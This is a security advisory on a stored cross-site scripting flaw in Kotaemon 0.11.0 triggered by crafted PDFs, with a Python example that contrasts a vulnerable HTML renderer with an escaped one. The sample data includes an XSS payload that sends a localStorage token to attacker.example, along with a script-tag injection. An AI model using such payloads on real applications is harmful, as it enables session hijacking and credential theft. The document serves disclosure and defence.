Kotaemon Cross-Site Scripting Vulnerability Allowing Arbitrary JavaScript Execution via Crafted PDF
Vulnerability
A stored cross-site scripting vulnerability has been identified in Kotaemon version 0.11.0. An attacker who can upload a PDF can embed JavaScript in it; the document's content is rendered into the application's pages without proper sanitization, so the script executes in the browser of the user viewing it. The issue is compounded by the application's practice of storing plaintext credentials in localStorage, which the injected script can read, leading to a complete session compromise.
Impact
Exploitation of this vulnerability allows arbitrary JavaScript to run in the context of the affected user's session, enabling theft of the credentials held in localStorage and hijacking of that session. Because the injected script also controls what the user sees in the page, it undermines trust in the application's document processing and in the integrity of the AI output presented to the user.
Reproduction
To reproduce this vulnerability, upload a PDF containing a crafted image or table whose content carries the script payload and therefore exploits the unsanitized rendering process. Once the document is uploaded and rendered in the UI, the embedded JavaScript executes, reads the stored credentials from localStorage and can exfiltrate them.
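The rendering flaw described above is a generic pattern: text a loader pulled out of an untrusted PDF (an image's alt or caption text, a table cell) is interpolated straight into HTML, so a quote or an angle bracket in that text becomes markup. The following is an added example, not Kotaemon's own code, that places a vulnerable renderer beside its hardened form using constructed extracted elements. The element shape, field names and the sample payload (which reads a hypothetical `token` key from localStorage, as the advisory describes) are assumptions for illustration.

```python
import html
import re
from dataclasses import dataclass, field


@dataclass
class Element:
    """One item a PDF loader handed back (hypothetical shape, constructed for this example)."""
    kind: str                                   # "text", "image" or "table"
    text: str = ""                              # paragraph text, or the image's alt/caption text
    src: str = ""                               # image location (hypothetical field)
    rows: list = field(default_factory=list)    # table rows as lists of cell strings


# Constructed sample: elements an attacker controls through a crafted PDF.
# The image caption closes the alt attribute and appends an onerror handler that
# posts a localStorage value to an attacker host; the table cell carries a script tag.
# Neither does anything unless it reaches the page unescaped.
ATTACKER_ELEMENTS = [
    Element("text", "Quarterly summary"),
    Element("image",
            text='chart" onerror="fetch(\'https://attacker.example/?t=\'+localStorage.getItem(\'token\'))',
            src="nonexistent.png"),
    Element("table", rows=[["Item", "Value"],
                           ["<script>alert(document.domain)</script>", "42"]]),
]


def _table_body(rows, cell):
    """Render table rows, applying `cell` to every cell string."""
    return "".join(
        "<tr>" + "".join(f"<td>{cell(c)}</td>" for c in row) + "</tr>"
        for row in rows)


def render_unsafe(elements):
    """Vulnerable pattern: extracted strings are interpolated straight into HTML."""
    out = []
    for el in elements:
        if el.kind == "text":
            out.append(f"<p>{el.text}</p>")
        elif el.kind == "image":
            out.append(f'<img src="{el.src}" alt="{el.text}">')
        elif el.kind == "table":
            out.append(f"<table>{_table_body(el.rows, str)}</table>")
    return "".join(out)


def render_safe(elements):
    """Hardened pattern: every attacker-influenced string is HTML-escaped with
    quote=True, so it can neither introduce a tag nor break out of an attribute."""
    def esc(s):
        return html.escape(str(s), quote=True)

    out = []
    for el in elements:
        if el.kind == "text":
            out.append(f"<p>{esc(el.text)}</p>")
        elif el.kind == "image":
            out.append(f'<img src="{esc(el.src)}" alt="{esc(el.text)}">')
        elif el.kind == "table":
            out.append(f"<table>{_table_body(el.rows, esc)}</table>")
    return "".join(out)


# Audit helper for comparing the two renderers: a live <script> tag, an event-handler
# attribute followed by a real quote, or a javascript: URL. This is a test probe,
# not a sanitizer; a blocklist is never the fix.
_ACTIVE = re.compile(r"<script\b|\son\w+\s*=\s*['\"]|javascript:", re.IGNORECASE)


def has_active_content(markup):
    """True if the rendered HTML still contains executable content."""
    return _ACTIVE.search(markup) is not None


if __name__ == "__main__":
    print("unsafe:", render_unsafe(ATTACKER_ELEMENTS))
    print("safe:  ", render_safe(ATTACKER_ELEMENTS))
    print("unsafe executes:", has_active_content(render_unsafe(ATTACKER_ELEMENTS)))
    print("safe executes:  ", has_active_content(render_safe(ATTACKER_ELEMENTS)))
```

Escaping is the right tool when extracted content is meant to be displayed as text. Where a pipeline genuinely needs to emit HTML (Markdown converted to HTML, for instance), run the result through an allowlist-based HTML sanitizer before it reaches the page, and keep session credentials out of localStorage so that a script which does slip through has nothing to read.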
Remediation
Users are advised to monitor for updates from the Kotaemon development team and to avoid uploading untrusted documents until a patch is available. Operators who may already have processed untrusted documents should treat credentials held in localStorage as exposed and rotate them.
